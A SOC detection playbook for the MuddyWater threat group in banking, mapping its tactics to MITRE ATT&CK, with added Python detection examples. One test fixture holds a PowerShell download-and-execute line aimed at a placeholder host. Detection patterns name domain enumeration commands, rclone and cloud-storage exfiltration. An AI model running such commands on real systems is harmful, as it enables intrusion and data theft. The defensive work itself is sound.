SOC Detection Playbook for MuddyWater (Seedworm) tailored to Banking & Financial Services.




It is operator‑ready, mapped to MITRE ATT&CK (G0069), and built around actual MuddyWater tradecraft observed in 2025–2026 campaigns against financial organizations 1 2 3. 

 

SOC Detection Playbook 

MuddyWater (Iran‑Aligned APT) — Banking Environment 

 

1. Threat Profile (For SOC Context) 

Actor: MuddyWater (aka Seedworm, Static Kitten, Mango Sandstorm) 
Attribution: Iranian Ministry of Intelligence and Security (MOIS) 
Primary Objective in Banking: 

  • Long‑term intelligence collection 

  • Pre‑positioning in financial networks 

  • Access brokerage (not immediate fraud or encryption) 

Recent activity confirms intrusions into U.S. banks and financial institutions using stealthy, admin‑like behavior rather than disruptive malware 4 5. 

 

2. SOC Detection Philosophy (Critical) 

Do not hunt ransomware. Hunt abnormal administration. 

MuddyWater: 

  • Avoids noisy malware 

  • Uses PowerShell, RMM tools, and cloud exfiltration 

  • Often pretends to be ransomware without encryption (false flags) 6 7 8 

 

3. Priority Detection Stages (Kill Chain) 

 

Stage 1 — Initial Access 

Threat Behaviors 

  • Microsoft Teams social engineering 

  • Phishing with follow‑on interactive access 

  • Exploitation of internet‑facing finance infrastructure 

MITRE 

  • T1566 (Phishing) 

  • T1190 (Exploit Public‑Facing App) 

9 10 

 

Detection Rules (SOC) 

Alert When: 

  • Teams chat started by external tenant → includes screen‑sharing 

  • User instructed to run commands or paste text into Run dialog 

  • MFA changes occurring within 30 minutes of a Teams interaction 

Data Sources 

  • Azure AD / Entra ID logs 

  • Microsoft Defender for Office 

  • Teams Audit Logs 

 

Analyst Triage Checklist 

  • Was screen sharing initiated? 

  • Did MFA methods or conditional access change? 

  • Was AnyDesk / DWAgent installed shortly after? 
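Added example (not part of the original playbook): a correlation check for the "MFA changes within 30 minutes of a Teams interaction" rule above. The flat field names and the sample events are constructed for this example; the Entra ID activity names are the ones used for security-info registration and are an assumption to confirm against your tenant's audit logs.

```python
from datetime import datetime, timedelta

# Constructed sample events for this example (not real telemetry). The flat field
# names are an assumed normalisation of Teams audit records and Entra ID audit
# records; map them to your SIEM's schema.
TEAMS_EVENTS = [
    {"time": "2026-01-14T09:02:00", "user": "j.doe", "external_tenant": True, "screen_share": True},
    {"time": "2026-01-14T11:40:00", "user": "a.lee", "external_tenant": False, "screen_share": True},
]
ENTRA_AUDIT = [
    {"time": "2026-01-14T09:21:00", "user": "j.doe", "activity": "User registered security info"},
    {"time": "2026-01-14T09:25:00", "user": "j.doe", "activity": "Update user"},
    {"time": "2026-01-14T12:30:00", "user": "a.lee", "activity": "User registered security info"},
]

# Entra ID audit activities that record an MFA method being added or removed (assumed names).
MFA_ACTIVITIES = {"User registered security info", "User deleted security info"}
WINDOW = timedelta(minutes=30)


def correlate_teams_mfa(teams_events, entra_audit, window=WINDOW):
    """Alert when an external-tenant Teams session that included screen sharing is
    followed, within `window`, by an MFA-method change for the same user."""
    alerts = []
    for t in teams_events:
        if not (t["external_tenant"] and t["screen_share"]):
            continue  # internal chats and plain messages are out of scope for this rule
        start = datetime.fromisoformat(t["time"])
        for e in entra_audit:
            if e["user"] != t["user"] or e["activity"] not in MFA_ACTIVITIES:
                continue
            delta = datetime.fromisoformat(e["time"]) - start
            if timedelta(0) <= delta <= window:  # change happened after the chat, not before
                alerts.append({
                    "user": t["user"],
                    "teams_time": t["time"],
                    "mfa_change_time": e["time"],
                    "minutes_after": int(delta.total_seconds() // 60),
                })
    return alerts


if __name__ == "__main__":
    for a in correlate_teams_mfa(TEAMS_EVENTS, ENTRA_AUDIT):
        print(f"ALERT {a['user']}: MFA change {a['minutes_after']} min after external Teams screen share")
```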

 

Stage 2 — Execution & Foothold 

Threat Behaviors 

  • Obfuscated PowerShell loaders 

  • Memory‑resident execution 

  • No dropper binaries 

MITRE 

  • T1059.001 (PowerShell) 

  • T1106 (Native API) 

11 12 

 

Detection Rules 

Trigger High Severity if: 

  • PowerShell with: 

      • -EncodedCommand 

      • IEX 

      • DownloadString 

  • PowerShell launched from: 

      • Outlook 

      • Teams 

      • Excel / Word 

Data Sources 

  • EDR 

  • PowerShell Script Block Logs 

  • Windows Event 4104 

 

Analyst Actions 

  • Decode PowerShell immediately 

  • Determine parent process legitimacy 

  • Pivot on host for persistence artifacts 
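Added example (not part of the original playbook) covering the Stage 2 rules and the "decode PowerShell immediately" action: it decodes an -EncodedCommand payload (base64 of UTF-16LE script text), scans both the raw command line and the decoded text for the IEX / DownloadString tokens, and checks for an Office or Teams parent. The process-creation records and their field names are constructed for this example.

```python
import base64
import re

# Parent processes the playbook treats as suspicious launchers for PowerShell.
OFFICE_PARENTS = {"outlook.exe", "ms-teams.exe", "teams.exe", "excel.exe", "winword.exe"}
# Tokens checked on the raw command line and on the decoded payload.
RISKY_TOKENS = re.compile(r"\b(iex|invoke-expression|downloadstring)\b", re.IGNORECASE)
# -EncodedCommand, -enc and -e all take a base64 blob of UTF-16LE script text.
ENCODED_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16: leave the raw line for the analyst


def score_powershell(record):
    """Return ("high", reasons) if the record matches the Stage 2 rules, else ("none", [])."""
    reasons = []
    decoded = decode_encoded_command(record["command_line"])
    if decoded is not None:
        reasons.append("encoded-command")
    for tok in RISKY_TOKENS.findall(record["command_line"] + " " + (decoded or "")):
        reasons.append("token:" + tok.lower())
    parent = record["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        reasons.append("parent:" + parent)
    return ("high" if reasons else "none"), reasons


# Constructed sample process-creation records (field names are assumptions).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_RECORDS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "command_line": "powershell.exe -nop -w hidden -EncodedCommand "
                     + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(score_powershell(rec))
```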

 

Stage 3 — Persistence (Banking‑Specific Risk) 

Threat Behaviors 

  • Registry Run keys 

  • Scheduled Tasks 

  • Legitimate remote management tools (RMM) 

MITRE 

  • T1547 (Autostart) 

  • T1219 (Remote Access Software) 

13 14 

 

Detection Rules 

Alert if: 

  • AnyDesk / DWAgent installed outside IT baseline 

  • New scheduled task running PowerShell 

  • Registry Run keys created by non‑IT admin accounts 

Data Sources 

  • EDR 

  • Sysmon 

  • Asset inventory 

 

Analyst Actions 

  • Validate RMM install against CAB/change logs 

  • Check persistence timestamps vs user activity 

  • Snapshot system before cleanup 
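Added example (not part of the original playbook) implementing the three Stage 3 rules against normalised events: Run-key writes by accounts outside the IT admin set, scheduled tasks whose action runs PowerShell, and RMM agents on hosts missing from the asset-inventory baseline. Account names, host names, the baseline and the event field names are all constructed assumptions.

```python
# Constructed baseline and sample events for this example; account names, host names
# and the flat event fields are assumptions, not the bank's real inventory.
IT_ADMIN_ACCOUNTS = {"BANK\\it.admin", "BANK\\svc_sccm"}
# Asset-inventory baseline: which hosts are allowed to run each RMM agent.
RMM_BASELINE = {"anydesk.exe": {"srv-helpdesk01"}, "dwagent.exe": set()}
RUN_KEYS = (r"\software\microsoft\windows\currentversion\run",
            r"\software\microsoft\windows\currentversion\runonce")


def check_persistence(event):
    """Apply the Stage 3 rules to one normalised event; return an alert dict or None."""
    kind = event["kind"]
    if kind == "registry_set":  # e.g. Sysmon Event 13
        key = event["target_object"].lower()
        if any(k in key for k in RUN_KEYS) and event["user"] not in IT_ADMIN_ACCOUNTS:
            return {"rule": "run-key-by-non-it-account", "host": event["host"], "user": event["user"]}
    elif kind == "scheduled_task_created":  # e.g. Security Event 4698
        if "powershell" in event["task_command"].lower():
            return {"rule": "scheduled-task-runs-powershell", "host": event["host"], "task": event["task_name"]}
    elif kind == "process_create":
        image = event["image"].rsplit("\\", 1)[-1].lower()
        if image in RMM_BASELINE and event["host"] not in RMM_BASELINE[image]:
            return {"rule": "rmm-outside-baseline", "host": event["host"], "tool": image}
    return None


def evaluate_persistence(events):
    return [a for a in map(check_persistence, events) if a is not None]


# Constructed sample events (one benign counterpart for each rule).
SAMPLE_EVENTS = [
    {"kind": "registry_set", "host": "ws-fin-042", "user": "BANK\\j.doe",
     "target_object": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"kind": "registry_set", "host": "ws-it-001", "user": "BANK\\it.admin",
     "target_object": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityAgent"},
    {"kind": "scheduled_task_created", "host": "ws-fin-042", "task_name": "\\Sync",
     "task_command": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\Users\Public\s.ps1"},
    {"kind": "process_create", "host": "ws-fin-042", "image": r"C:\Users\j.doe\AppData\Local\AnyDesk\AnyDesk.exe"},
    {"kind": "process_create", "host": "srv-helpdesk01", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"},
]
```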

 

Stage 4 — Credential Access & Lateral Movement 

Threat Behaviors 

  • MFA manipulation 

  • Domain enumeration 

  • RDP movement toward financial systems 

MITRE 

  • T1110 (Credential Access) 

  • T1087 (Account Discovery) 

  • T1021 (Remote Services) 

15 16 

 

Detection Rules 

Trigger alerts on: 

  • MFA resets not initiated by IAM team 

  • net user /domain or nltest execution 

  • RDP from user workstation → server subnet 

Special Focus 

  • AD accounts tied to: 

      • Core banking 

      • Treasury 

      • Payment processing 

 

Analyst Actions 

  • Identify credential exposure scope 

  • Force password & token invalidation 

  • Hunt for parallel sessions 
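Added example (not part of the original playbook) for two of the Stage 4 rules: RDP from a user workstation straight into a financial server subnet (bypassing approved jump hosts), and execution of the domain enumeration commands named above. The subnets, jump host, and sample connection and process records are constructed assumptions.

```python
import ipaddress
import re

# Constructed network zones for this example (assumptions, not a real bank's addressing).
WORKSTATION_NETS = [ipaddress.ip_network("10.10.0.0/16")]
FINANCIAL_SERVER_NETS = {
    "core_banking": ipaddress.ip_network("10.50.1.0/24"),
    "treasury": ipaddress.ip_network("10.50.2.0/24"),
    "payments": ipaddress.ip_network("10.50.3.0/24"),
}
APPROVED_JUMP_HOSTS = {ipaddress.ip_address("10.20.0.5")}
# Domain enumeration the playbook calls out: `net user /domain` (also net group ... /domain) and nltest.
ENUM_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bnet1?(?:\.exe)?\s+(?:user|group)\b.*?/domain\b",
    r"\bnltest(?:\.exe)?\b",
)]


def rdp_to_financial_servers(connections):
    """Flag tcp/3389 from a user workstation directly into a financial server subnet."""
    hits = []
    for c in connections:
        if c["dst_port"] != 3389:
            continue
        src, dst = ipaddress.ip_address(c["src_ip"]), ipaddress.ip_address(c["dst_ip"])
        if src in APPROVED_JUMP_HOSTS or not any(src in n for n in WORKSTATION_NETS):
            continue  # jump-host and server-originated RDP belong to other rules
        for zone, net in FINANCIAL_SERVER_NETS.items():
            if dst in net:
                hits.append({"user": c["user"], "src": c["src_ip"], "dst": c["dst_ip"], "zone": zone})
    return hits


def enumeration_commands(processes):
    """Process-creation records whose command line matches an enumeration pattern."""
    return [p for p in processes if any(rx.search(p["command_line"]) for rx in ENUM_PATTERNS)]


# Constructed sample records (field names are assumptions).
CONNECTIONS = [
    {"user": "j.doe", "src_ip": "10.10.4.21", "dst_ip": "10.50.1.15", "dst_port": 3389},
    {"user": "it.admin", "src_ip": "10.20.0.5", "dst_ip": "10.50.1.15", "dst_port": 3389},
    {"user": "j.doe", "src_ip": "10.10.4.21", "dst_ip": "10.10.4.30", "dst_port": 3389},
]
PROCESSES = [
    {"user": "j.doe", "command_line": "net user /domain"},
    {"user": "svc_backup", "command_line": r"net use Z: \\fs01\backups"},
    {"user": "j.doe", "command_line": "nltest /dclist:corp.invalid"},
]
```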

 

Stage 5 — Data Collection & Exfiltration 

Threat Behaviors 

  • Cloud‑based exfiltration 

  • Native compression tools 

  • No immediate financial theft 

MITRE 

  • T1560 (Archive Data) 

  • T1041 (Exfiltration) 

17 18 

 

Detection Rules 

High‑confidence MuddyWater indicator: 

  • rclone execution 

  • makecab.exe used outside packaging servers 

  • Outbound traffic to: 

      • Wasabi 

      • Backblaze 

      • OneHub 

      • TeraBox 

 

Analyst Actions 

  • Isolate host immediately 

  • Capture exfil indicators 

  • Notify legal/compliance (regulatory exposure) 
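Added example (not part of the original playbook) for the Stage 5 rules: it flags rclone execution, makecab.exe on hosts outside the packaging servers, and egress to the listed cloud-storage services, then correlates staging and egress per host. The packaging-server list, host names and event fields are constructed; the service domain suffixes are assumptions to verify against your own egress allow/deny lists.

```python
# Constructed baseline and sample events (host names, domains and fields are assumptions).
PACKAGING_SERVERS = {"srv-build01", "srv-build02"}  # only hosts expected to run makecab
# Cloud-storage services the playbook names; suffixes are assumed, verify against your lists.
CLOUD_STORAGE_SUFFIXES = ("wasabisys.com", "backblazeb2.com", "onehub.com", "terabox.com")


def staging_findings(process_events):
    """rclone anywhere, or makecab.exe outside the packaging servers."""
    out = []
    for p in process_events:
        image = p["image"].rsplit("\\", 1)[-1].lower()
        if image == "rclone.exe":
            out.append({"host": p["host"], "finding": "rclone-execution"})
        elif image == "makecab.exe" and p["host"] not in PACKAGING_SERVERS:
            out.append({"host": p["host"], "finding": "makecab-outside-packaging"})
    return out


def egress_findings(network_events):
    """Outbound connections whose destination hostname belongs to a listed cloud-storage service."""
    out = []
    for n in network_events:
        host = n["dst_hostname"].lower().rstrip(".")
        if any(host == s or host.endswith("." + s) for s in CLOUD_STORAGE_SUFFIXES):
            out.append({"host": n["host"], "finding": "cloud-storage-egress", "dst": host})
    return out


def exfil_alerts(process_events, network_events):
    """Per host: rclone alone is high-confidence (as the playbook states); makecab or cloud
    egress alone is a medium-confidence lead; staging plus egress on one host is high."""
    by_host = {}
    for f in staging_findings(process_events) + egress_findings(network_events):
        by_host.setdefault(f["host"], set()).add(f["finding"])
    alerts = []
    for host, findings in by_host.items():
        staged = findings & {"rclone-execution", "makecab-outside-packaging"}
        high = "rclone-execution" in findings or (staged and "cloud-storage-egress" in findings)
        alerts.append({"host": host, "confidence": "high" if high else "medium",
                       "findings": sorted(findings)})
    return sorted(alerts, key=lambda a: a["host"])


SAMPLE_PROCESSES = [
    {"host": "ws-fin-042", "image": r"C:\Users\Public\rclone.exe"},
    {"host": "srv-build01", "image": r"C:\Windows\System32\makecab.exe"},
    {"host": "ws-fin-017", "image": r"C:\Windows\System32\makecab.exe"},
]
SAMPLE_NETWORK = [
    {"host": "ws-fin-042", "dst_hostname": "s3.eu-central-1.wasabisys.com"},
    {"host": "ws-fin-099", "dst_hostname": "api.backblazeb2.com"},
]
```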

 

Stage 6 — False‑Flag Ransomware (2026 Pattern) 

Observed Pattern 

  • Extortion emails 

  • Leak site references 

  • No encryption activity 

This behavior has been explicitly observed in Chaos ransomware false‑flag operations attributed to MuddyWater 19 20 21. 

 

SOC Guidance 

If: 

  • Extortion claim without encryption 

  • RMM + data theft present 

Treat as APT incident, not criminal ransomware. 

 

4. Incident Response Playbook (Condensed) 

Containment 

  • Disable accounts 

  • Isolate hosts 

  • Block RMM tools globally (temporary) 

Eradication 

  • Remove persistence 

  • Reimage high‑value systems 

  • Rotate all exposed secrets 

Recovery 

  • Restore clean backups 

  • Re‑baseline admin behavior 

Reporting 

  • Regulatory notification assessment (FFIEC, SEC, OCC) 

  • Preserve evidence (nation‑state actor) 

 

5. SOC KPIs for MuddyWater Readiness 

Metric                   Target 

PowerShell decode time   < 10 minutes 

RMM abuse detection      < 1 hour 

MFA tampering alerts     Real‑time 

Time to isolate host     < 15 minutes 

 

Bottom Line for Banking SOCs 

  • MuddyWater blends into legitimate IT operations 

  • They want access and intelligence, not money—at first 

  • False‑flag ransomware is intentional misdirection 

  • EDR + identity telemetry is more important than signature AV 

 
